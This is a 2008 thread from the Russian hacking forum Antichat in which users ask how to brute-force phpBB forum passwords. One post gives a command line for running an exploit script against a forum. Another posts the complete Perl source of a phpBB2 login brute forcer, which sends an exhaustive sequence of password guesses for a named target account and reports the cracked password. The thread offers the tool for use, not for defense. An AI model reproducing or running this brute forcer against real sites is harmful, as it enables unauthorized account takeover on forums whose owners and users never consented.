Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.06.2008, 19:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858
Репутация:
979
|
|
xmm
xmm
Последний раз редактировалось rushter; 06.04.2009 в 20:34..
|
|
|
20.06.2008, 19:27
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
конечно существуетюзай поиск сдесь K1borg писал
вот ссылко
http://forum.antichat.ru/showpost.php?p=474307&postcount=7
ЗЫ и впредь ЮЗЬ поиск
Последний раз редактировалось satana8920; 20.06.2008 в 19:31..
|
|
|
|
20.06.2008, 19:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858
Репутация:
979
|
|
xmm
Последний раз редактировалось rushter; 06.04.2009 в 20:35..
|
|
|
|
20.06.2008, 19:53
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
здрасте приехали это все таки брутер а не миксер блин
|
|
|
|
20.06.2008, 19:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858
Репутация:
979
|
|
xmm
Последний раз редактировалось rushter; 06.04.2009 в 20:35..
|
|
|
|
26.06.2008, 13:56
|
|
Новичок
Регистрация: 04.06.2008
Сообщений: 1
Провел на форуме:
220433
Репутация:
0
|
|
Да мне тоже интерестно как?=)
|
|
|
|
26.06.2008, 14:54
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
выдрать - собрать словарь - пробрутить.
|
|
|
|
01.07.2008, 11:35
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
тоже попробовал - давно юзаю этот .pl, но именно с брутом непонятки - зарегился на форуме, сделал в той же папке, где и phpbb.pl файл pass.txt, в нем ТОЛЬКО один мой пароль (правильный), запускаю, начинается брут, НО РЕЗУЛЬТАТЫ никуда не сохраняются и в процессе работы ничего не показывается (т.е. в других режимах все пишется в log.txt - а в режиме брута вообще трудно понять, делается ли что-нибудь в принципе, и если есть ошибки - то какие. Запускаю так (чтобы все видно было):
cmd /k C:\Perl\bin\wperl.exe C:\Perl\bin\Sploits\phpbb.pl -v3 -uhttp://forum/index.php -lVassia -fpass.txt
т.е. брут не работает, или где?  Версия форума 2.020
Инфо о форуме включая серверный путь успешно выдрал. При сканировании неподдерживаемых версий форума скрипт в лог все-равно пишет "ну не могу я поломать". А тут тишина. |
|
|
|
01.07.2008, 11:56
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Код:
#!/usr/bin/perl
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);
$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars
print q(
###########################################################
# phpBB2 brute forcer #
# http://www.unnamedone.com #
# brian_denys@hotmail.com #
# 12 - April - 2008 #
################## Coded By UnnamedOne ####################
);
if (@ARGV < 4)
{
print " # I am not responsible for anything that you do with this!\n";
print " # This has been tested on phpBB2!\n";
print " # usage : phpbb2.pl [host & path] [user] [pass] [target]\n";
print " # E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n";
exit();
}
fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
crack($t);
}
sub fakelogin
{
$xplr = LWP::UserAgent->new() or die;
$cookie_jarr = HTTP::Cookies->new();
$xplr->cookie_jar( $cookie_jarr );
$resr = $xplr->post($url.'login.php',
Content => [
"username" => "$usern",
"password" => "$passw",
"login" => "Log in",
"newregister" => "Register",
],);
if($cookie_jarr->as_string =~ /%22%3B%7D/) {
#Do nothing..
}
else
{
print $cookie_jarr->as_string;
print "Forum not vulnerable or wrong username / password.\n";
exit();
}
}
sub crack
{
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++)
{
$RawString[i] = 0;
}
$Start = gettimeofday();
do {
for (my $i =0;$i<$CharSet;$i++) {
if ($RawString[$i] > length($alpha)-1) {
if ($i==$CharSet-1)
{
$cnt = 0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
$ret = "";
for (my $i =0;$i<$CharSet;$i++) {
$ret = $ret . substr($alpha,$RawString[$i],1);
}
$count++;
if($count == 4) {
#fakelogin();
$count = 0;
}
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'login.php',
Content => [
"username" => "$uname",
"password" => "$ret",
"login" => "Log in",
"newregister" => "Register",
],);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr) {
$cnt = int($cnt/$dbgtmr);
$Start = gettimeofday();
}
$logins++;
system("clear");
$pro = ($logins / ($charcount * $maxchars));
print "Current password: $ret\n";
print "Login attempts: $logins\n";
print "Cracking speed: $cnt passwords/sec\n";
print "$pro% finished.\n";
$cnt = 0;
if($cookie_jar->as_string =~ /%22%3B%7D/) {
print "Password cracked! => $ret\n";
exit();
}
$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));
}
|
|
|
|
01.07.2008, 12:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Если не трудно, как расшифровать эту строчку:
usage : phpbb2.pl [host & path] [user] [pass] [target]\n
В принципе понятно, только непонятно откуда что берется
И особенно с target непонятно. Здесь вообще брут по словарю одного юзера или что?
Запускаю - ноль эмоций, ни сообщений об ошибке, ничего вообще
Я понимаю, что пример есть:
E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n
что такое в данном случае UnnamedOne, MyPass и str0ke\n???
Имя юзера какого-то, какой-то мой Пароль и строка какая-то
Последний раз редактировалось Pashkela; 01.07.2008 в 12:30..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
